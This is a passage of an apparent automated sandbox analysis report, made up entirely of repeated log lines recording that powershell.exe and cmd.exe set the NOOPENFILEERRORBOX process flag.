                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
